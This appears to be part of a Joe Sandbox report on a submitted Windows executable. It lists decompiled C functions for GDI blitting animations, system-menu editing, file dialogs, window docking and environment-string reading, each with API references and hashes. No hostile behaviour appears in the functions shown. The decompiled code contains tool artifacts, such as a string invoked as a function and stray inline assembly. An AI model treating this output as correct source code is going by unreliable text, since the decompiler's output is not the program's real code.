0x00000000

APIs

GetKeyState.USER32(00000001), ref: 0041E764
GetCursorPos.USER32(?), ref: 0041E782
ScreenToClient.USER32 ref: 0041E78F
GetCapture.USER32 ref: 0041E7DF

Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD

ClientToScreen.USER32(?,?), ref: 0041E829
WindowFromPoint.USER32(?,?), ref: 0041E835
IsChild.USER32(?,00000000), ref: 0041E84A
KillTimer.USER32(?,0000E001), ref: 0041E890
KillTimer.USER32(?,0000E000), ref: 0041E8AD

Part of subcall function 00414D5B: GetForegroundWindow.USER32(00000000,?,0041E7BB), ref: 00414D5F
Part of subcall function 00414D5B: GetLastActivePopup.USER32(?), ref: 00414D77

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
String ID:
API String ID: 1383385731-0
Opcode ID: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
Instruction ID: 60a7b001f52f4571865f2cd2d5ebedbd3e454d14a8c641626661d3e0f237eb6f
Opcode Fuzzy Hash: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
Instruction Fuzzy Hash: 4D416334B00605DFDB20AF66CC44AEE7BB5EF44714F20866AE861D72E1D738DD819B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040443F, Relevance: 13.6, APIs: 9, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040443F(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t111;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a28 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24, (_v12 + 1) * _a40, _a32, _v8, 0, 0, 0xcc0020);
					E0040381D(_a36);
					_t111 = _t111 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

0x0040444f
0x00404464
0x0040446f
0x00404496
0x0040449c
0x004044ae
0x004044b1
0x004044bb
0x00000000
0x00000000
0x004044ed
0x0040451b
0x00404525
0x0040452a
0x004044ab
0x004044ab
0x00404557
0x00404561
0x0040456b
0x00404576

APIs

CreateCompatibleDC.GDI32(?), ref: 00404449
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040445E
SelectObject.GDI32(?,?), ref: 0040446F
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404496
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 004044ED
BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 0040451B
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 00404557
DeleteObject.GDI32(?), ref: 00404561
DeleteDC.GDI32(?), ref: 0040456B

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
Instruction ID: 5871b13c33776004db1b10881a90cc129f1f9f80c304186c253610c93300aed5
Opcode Fuzzy Hash: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
Instruction Fuzzy Hash: D84164B6600108AFCB14CF98DD95FEE77B9EB8C744F118258FA09A7294D634ED11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004046DE, Relevance: 13.6, APIs: 9, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004046DE(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t111;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a32 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, 0, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24, _a28, (_v12 + 1) * _a40, _v8, 0, 0, 0xcc0020);
					E0040381D(_a36);
					_t111 = _t111 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

0x004046ee
0x00404703
0x0040470e
0x00404735
0x0040473b
0x0040474d
0x00404750
0x0040475a
0x00000000
0x00000000
0x0040478c
0x004047ba
0x004047c4
0x004047c9
0x0040474a
0x0040474a
0x004047f6
0x00404800
0x0040480a
0x00404815

APIs

CreateCompatibleDC.GDI32(?), ref: 004046E8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 004046FD
SelectObject.GDI32(?,?), ref: 0040470E
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404735
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 0040478C
BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 004047BA
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004047F6
DeleteObject.GDI32(?), ref: 00404800
DeleteDC.GDI32(?), ref: 0040480A

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
Instruction ID: 516329d77e908a997c244217de3d4d8bb9b87b0cd9461334f0d2af6cacd336f2
Opcode Fuzzy Hash: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
Instruction Fuzzy Hash: 6F4174B6600108EBCB04CF98DD95FAE77B9EB8C744F158258FA09A7250D634E9118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF9A, Relevance: 13.6, APIs: 9, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041DF9A(signed int __ecx) {
				void* _t33;
				void* _t34;
				CHAR* _t41;
				signed int _t42;
				signed int _t43;
				struct HWND__* _t44;
				signed int _t51;
				void* _t53;
				signed int _t62;
				signed int _t73;
				signed int _t75;
				void* _t77;

				E00406520(E0042A610, _t77);
				_push(__ecx);
				_t51 =  *(_t77 + 0xc);
				_t62 = __ecx;
				_t33 = 0x80c83b00;
				 *(_t77 - 0x10) = __ecx;
				 *((intOrPtr*)(__ecx + 0xb0)) = 1;
				if((_t51 & 0x00000004) != 0) {
					_t33 = 0x80c83300;
				}
				_t34 = E00422BCF(_t62, 0, 0, 0x4399a0, _t33, 0x439630,  *((intOrPtr*)(_t77 + 8)), 0);
				if(_t34 != 0) {
					asm("sbb esi, esi");
					_t73 = ( ~(_t51 & 0x00005000) & 0x0000f000) + 0x00002000 | _t51 & 0x00000040;
					_push(GetSystemMenu( *(_t62 + 0x1c), 0));
					_t53 = E00417635();
					DeleteMenu( *(_t53 + 4), 0xf000, 0);
					DeleteMenu( *(_t53 + 4), 0xf020, 0);
					DeleteMenu( *(_t53 + 4), 0xf030, 0);
					DeleteMenu( *(_t53 + 4), 0xf120, 0);
					_t41 =  *0x436980; // 0x436994
					 *(_t77 + 0xc) = _t41;
					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
					_t42 = E00417214(_t77 + 0xc, __eflags, 0xf011);
					__eflags = _t42;
					if(_t42 != 0) {
						DeleteMenu( *(_t53 + 4), 0xf060, 0);
						AppendMenuA( *(_t53 + 4), 0, 0xf060,  *(_t77 + 0xc));
					}
					_t75 =  *(_t77 - 0x10);
					_t43 = E0041D0E3(_t75 + 0xcc,  *((intOrPtr*)(_t77 + 8)), _t73 | 0x50000000, 0xe81f);
					__eflags = _t43;
					if(_t43 != 0) {
						__eflags = _t75;
						if(_t75 != 0) {
							_t44 =  *(_t75 + 0x1c);
						} else {
							_t44 = 0;
						}
						E00413740(_t77, SetParent( *(_t75 + 0xe8), _t44));
						_push(1);
						_pop(0);
					}
					 *(_t75 + 0xb0) =  *(_t75 + 0xb0) & 0x00000000;
					_t27 = _t77 - 4;
					 *_t27 =  *(_t77 - 4) | 0xffffffff;
					__eflags =  *_t27;
					E00416AEC(_t77 + 0xc);
					_t34 = 0;
				} else {
					 *((intOrPtr*)(_t62 + 0xb0)) = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t34;
			}

0x0041df9f
0x0041dfa4
0x0041dfa6
0x0041dfab
0x0041dfad
0x0041dfb5
0x0041dfb8
0x0041dfc2
0x0041dfc4
0x0041dfc4
0x0041dfde
0x0041dfe5
0x0041e001
0x0041e011
0x0041e019
0x0041e025
0x0041e031
0x0041e03d
0x0041e049
0x0041e055
0x0041e057
0x0041e05c
0x0041e05f
0x0041e06b
0x0041e070
0x0041e072
0x0041e07e
0x0041e08d
0x0041e08d
0x0041e09f
0x0041e0ab
0x0041e0b0
0x0041e0b2
0x0041e0b8
0x0041e0ba
0x0041e0c0
0x0041e0bc
0x0041e0bc
0x0041e0bc
0x0041e0d1
0x0041e0d6
0x0041e0d8
0x0041e0d8
0x0041e0d9
0x0041e0e0
0x0041e0e0
0x0041e0e0
0x0041e0e7
0x0041e0ec
0x0041dfe7
0x0041dfe7
0x0041dfe7
0x0041e0f4
0x0041e0fc

APIs

__EH_prolog.LIBCMT ref: 0041DF9F
GetSystemMenu.USER32(?,00000000), ref: 0041E013
DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 0041E031
DeleteMenu.USER32(?,0000F020,00000000), ref: 0041E03D
DeleteMenu.USER32(?,0000F030,00000000), ref: 0041E049
DeleteMenu.USER32(?,0000F120,00000000), ref: 0041E055
DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 0041E07E
AppendMenuA.USER32 ref: 0041E08D
SetParent.USER32(?,?), ref: 0041E0CA

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Menu$Delete$AppendH_prologParentSystem
String ID:
API String ID: 3391233131-0
Opcode ID: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
Instruction ID: 3b28708bc0a1016f049b86d81bab26ae888aa54a77c2c6cf0aff380c6ea48e92
Opcode Fuzzy Hash: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
Instruction Fuzzy Hash: 3431C271740211BBEB309F62CC46F9ABF64EF48714F118126FA09AA1E1C7B8A901CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 004104E7, Relevance: 13.6, APIs: 9, Instructions: 80
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E004104E7(void* __ebx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ecx;
				void* __esi;
				struct HWND__* _t28;
				int _t31;
				int _t32;
				int _t34;
				void* _t35;
				void* _t40;
				void* _t41;
				signed int _t43;
				signed int _t52;

				_t40 = __ebx;
				_t52 = _t43;
				E00406330(lstrlenA( *(_t52 + 0x78)) + 1 +  *(_t52 + 0x78), 0,  *((intOrPtr*)(_t52 + 0x7c)) - lstrlenA( *(_t52 + 0x78)) + 1);
				_v8 = GetFocus();
				 *(_t52 + 0x60) = E004120A5(_t52);
				E00413C3E();
				_t28 =  *(_t52 + 0x60);
				if(_t28 != 0 && IsWindowEnabled(_t28) != 0) {
					_push(1);
					_pop(0);
					EnableWindow( *(_t52 + 0x60), 0);
				}
				_push(_t40);
				_t41 = E004249C4();
				if(( *(_t52 + 0x92) & 0x00000008) == 0) {
					_push(_t52);
					"VWh\rDB"();
				} else {
					 *(_t41 + 0x18) = _t52;
				}
				_push(_t52 + 0x5c);
				if( *((intOrPtr*)(_t52 + 0xa8)) == 0) {
					_t31 = GetSaveFileNameA();
				} else {
					_t31 = GetOpenFileNameA();
				}
				 *(_t41 + 0x18) =  *(_t41 + 0x18) & 0x00000000;
				_v8 = _t31;
				if(0 != 0) {
					EnableWindow( *(_t52 + 0x60), 1);
				}
				_t32 = IsWindow(_v12);
				_t64 = _t32;
				if(_t32 != 0) {
					SetFocus(_v12);
				}
				E004120DF(_t52, _t52, _t64);
				_t34 = _v8;
				if(_t34 == 0) {
					_t35 = 2;
					return _t35;
				}
				return _t34;
			}

0x004104e7
0x004104eb
0x00410504
0x00410514
0x0041051f
0x00410522
0x00410527
0x00410532
0x0041053f
0x00410541
0x00410547
0x00410547
0x00410549
0x00410556
0x00410558
0x0041055f
0x00410560
0x0041055a
0x0041055a
0x0041055a
0x0041056f
0x00410570
0x00410579
0x00410572
0x00410572
0x00410572
0x0041057e
0x00410582
0x00410589
0x00410590
0x00410590
0x00410596
0x0041059c
0x0041059e
0x004105a4
0x004105a4
0x004105ac
0x004105b1
0x004105ba
0x004105be
0x00000000
0x004105be
0x004105c1

APIs

lstrlenA.KERNEL32(?), ref: 004104F1
GetFocus.USER32 ref: 0041050C

Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63

IsWindowEnabled.USER32(?), ref: 00410535
EnableWindow.USER32(?,00000000), ref: 00410547
GetOpenFileNameA.COMDLG32(?), ref: 00410572
GetSaveFileNameA.COMDLG32(?), ref: 00410579
EnableWindow.USER32(?,00000001), ref: 00410590
IsWindow.USER32(00000000), ref: 00410596
SetFocus.USER32(00000000), ref: 004105A4

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
String ID:
API String ID: 3606897497-0
Opcode ID: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
Instruction ID: cfd9afc9f89d739c60573f6ed008476d2ccbece9f7daf62680160fc279b61255
Opcode Fuzzy Hash: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
Instruction Fuzzy Hash: 68219271210700BFD724AF32DC4AB9B7BE9EF44305F04442EF55696292DBB9E8C18B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3C1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0041D3C1(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				struct tagRECT _v20;
				struct tagRECT _v36;
				char _v296;
				void* __ebp;
				int _t61;
				signed char _t64;
				signed char _t69;
				void* _t79;
				struct HWND__* _t81;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t130;
				signed int _t131;
				intOrPtr _t134;
				void* _t136;

				_t130 = __edx;
				_t134 = _a4;
				_t109 = __ecx;
				_t61 = GetWindowRect( *(_t134 + 0x1c),  &_v36);
				if( *((intOrPtr*)(_t134 + 0x70)) != _t109) {
					L3:
					if( *((intOrPtr*)(_t109 + 0x78)) != 0 && ( *(_t134 + 0x68) & 0x00000040) != 0) {
						 *(_t109 + 0x64) =  *(_t109 + 0x64) | 0x00000040;
					}
					 *(_t109 + 0x64) =  *(_t109 + 0x64) & 0xfffffff9;
					_t64 =  *(_t134 + 0x64) & 0x00000006 |  *(_t109 + 0x64);
					 *(_t109 + 0x64) = _t64;
					if((_t64 & 0x00000040) == 0) {
						E004165E5(_t134,  &_v296, 0x104);
						E0041A843( *(_t109 + 0x1c),  &_v296);
					}
					_t69 = ( *(_t109 + 0x64) ^  *(_t134 + 0x64)) & 0x0000f000 ^  *(_t134 + 0x64) | 0x0000000f;
					if( *((intOrPtr*)(_t109 + 0x78)) == 0) {
						_t70 = _t69 & 0x000000fe;
						__eflags = _t69 & 0x000000fe;
					} else {
						_t70 = _t69 | 0x00000001;
					}
					E004263C3(_t134, _t70);
					_t131 = E0041DCB9(_t109, GetDlgCtrlID( *(_t134 + 0x1c)) & 0x0000ffff, 0xffffffff);
					if(_t131 > 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x80)) + _t131 * 4)) = _t134;
					}
					if(_a8 == 0) {
						__eflags = _t131 - 1;
						if(_t131 < 1) {
							_t132 = _t109 + 0x7c;
							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t109 + 0x84)), _t134);
							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t132 + 8)), 0);
						}
						_t115 =  *0x439bf4; // 0x2
						__eflags = 0;
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x439bf0; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect( &_v20, _a8);
						E0041A2F1(_t109,  &_v20);
						if(_t131 < 1) {
							asm("cdq");
							asm("cdq");
							_push((_v20.bottom - _v20.top - _t130 >> 1) + _v20.top);
							_push((_v20.right - _v20.left - _t130 >> 1) + _v20.left);
							asm("movsd");
							asm("movsd");
							_push(_a4);
							asm("movsd");
							asm("movsd");
							E0041DD44(_t109);
							_t134 = _a4;
						}
						_push(0x114);
						_push(_v20.bottom - _v20.top);
						_push(_v20.right - _v20.left);
						_push(_v20.top);
						_push(_v20.left);
						_push(0);
					}
					E0041663D(_t134);
					if(E00413740(_t136, GetParent( *(_t134 + 0x1c))) != _t109) {
						if(_t109 != 0) {
							_t81 =  *(_t109 + 0x1c);
						} else {
							_t81 = 0;
						}
						E00413740(_t136, SetParent( *(_t134 + 0x1c), _t81));
					}
					_t120 =  *((intOrPtr*)(_t134 + 0x70));
					_t153 =  *((intOrPtr*)(_t134 + 0x70));
					if( *((intOrPtr*)(_t134 + 0x70)) != 0) {
						E0041D609(_t120, _t153, _t134, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t134 + 0x70)) = _t109;
					_t79 = E004225AA(_t109, _t153);
					 *(_t79 + 0xb8) =  *(_t79 + 0xb8) | 0x0000000c;
					return _t79;
				}
				if(_a8 != 0) {
					_t61 = EqualRect( &_v36, _a8);
					if(_t61 == 0) {
						goto L3;
					}
				}
				return _t61;
			}

0x0041d3c1
0x0041d3cc
0x0041d3d7
0x0041d3d9
0x0041d3e2
0x0041d403
0x0041d407
0x0041d40f
0x0041d40f
0x0041d413
0x0041d420
0x0041d424
0x0041d427
0x0041d437
0x0041d446
0x0041d446
0x0041d45a
0x0041d461
0x0041d467
0x0041d467
0x0041d463
0x0041d463
0x0041d463
0x0041d46c
0x0041d487
0x0041d48b
0x0041d493
0x0041d493
0x0041d49a
0x0041d50f
0x0041d512
0x0041d514
0x0041d51d
0x0041d529
0x0041d529
0x0041d52e
0x0041d534
0x0041d536
0x0041d53b
0x0041d53e
0x0041d53f
0x0041d540
0x0041d548
0x0041d549
0x0041d49c
0x0041d4a3
0x0041d4af
0x0041d4b7
0x0041d4c2
0x0041d4d2
0x0041d4da
0x0041d4db
0x0041d4e3
0x0041d4e4
0x0041d4e5
0x0041d4e8
0x0041d4e9
0x0041d4ea
0x0041d4ef
0x0041d4ef
0x0041d4f5
0x0041d4fd
0x0041d504
0x0041d505
0x0041d508
0x0041d50b
0x0041d50b
0x0041d54c
0x0041d562
0x0041d566
0x0041d56c
0x0041d568
0x0041d568
0x0041d568
0x0041d57a
0x0041d57a
0x0041d57f
0x0041d582
0x0041d584
0x0041d58b
0x0041d58b
0x0041d592
0x0041d595
0x0041d59a
0x00000000
0x0041d59a
0x0041d3e8
0x0041d3f5
0x0041d3fd
0x00000000
0x00000000
0x0041d3fd
0x0041d5a5

APIs

GetWindowRect.USER32 ref: 0041D3D9
EqualRect.USER32 ref: 0041D3F5
GetDlgCtrlID.USER32 ref: 0041D476
CopyRect.USER32 ref: 0041D4A3
GetParent.USER32(?), ref: 0041D554
SetParent.USER32(?,?), ref: 0041D573

Strings

@, xrefs: 0041D40F

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Parent$CopyCtrlEqualWindow
String ID: @
API String ID: 3581194824-2766056989
Opcode ID: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
Instruction ID: 8366d14a4fbab590a3c5e893c5bf745e495171ad1a8ef82a64abe53d0d133945
Opcode Fuzzy Hash: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
Instruction Fuzzy Hash: 88518FB1A00615ABDF14DF69CC85AEE77AAEB44308F00452AE912D72A1DB38E985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00409509, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409509() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x439ed4; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E00405667(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00405700(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00405667(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E004062E0(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x439ed4 = 2;
					goto L18;
				}
				 *0x439ed4 = 1;
				goto L6;
			}

0x0040950b
0x0040951a
0x0040951c
0x0040951e
0x00409522
0x0040955a
0x004095e4
0x00409632
0x00000000
0x00409632
0x004095e6
0x004095e8
0x004095f6
0x004095f8
0x004095fa
0x00409606
0x00409609
0x00409611
0x00409616
0x0040961f
0x00409618
0x00409618
0x00409618
0x00409628
0x00000000
0x00000000
0x00000000
0x00000000
0x004095fc
0x004095fc
0x004095fc
0x004095fc
0x004095fd
0x00409601
0x00409602
0x00000000
0x004095fc
0x004095f0
0x004095f4
0x00000000
0x00000000
0x00000000
0x004095f4
0x00409560
0x00409562
0x00409570
0x00409573
0x00409575
0x00409585
0x00409591
0x00409598
0x0040959e
0x004095a2
0x004095a5
0x004095ad
0x004095b1
0x004095c2
0x004095c8
0x004095ce
0x004095ce
0x004095d2
0x004095d2
0x004095b1
0x004095d7
0x00000000
0x00000000
0x00000000
0x00000000
0x00409577
0x00409577
0x00409577
0x00409578
0x00409579
0x0040957f
0x00409580
0x00000000
0x00409577
0x00409566
0x0040956a
0x00000000
0x00000000
0x00000000
0x0040956a
0x00409526
0x0040952a
0x0040953e
0x00409542
0x00000000
0x00000000
0x00409548
0x00000000
0x00409548
0x0040952c
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409524
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409538
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409564
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 0040959C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 004095BE
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040641E), ref: 004095D7
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 004095EA
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00409628

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

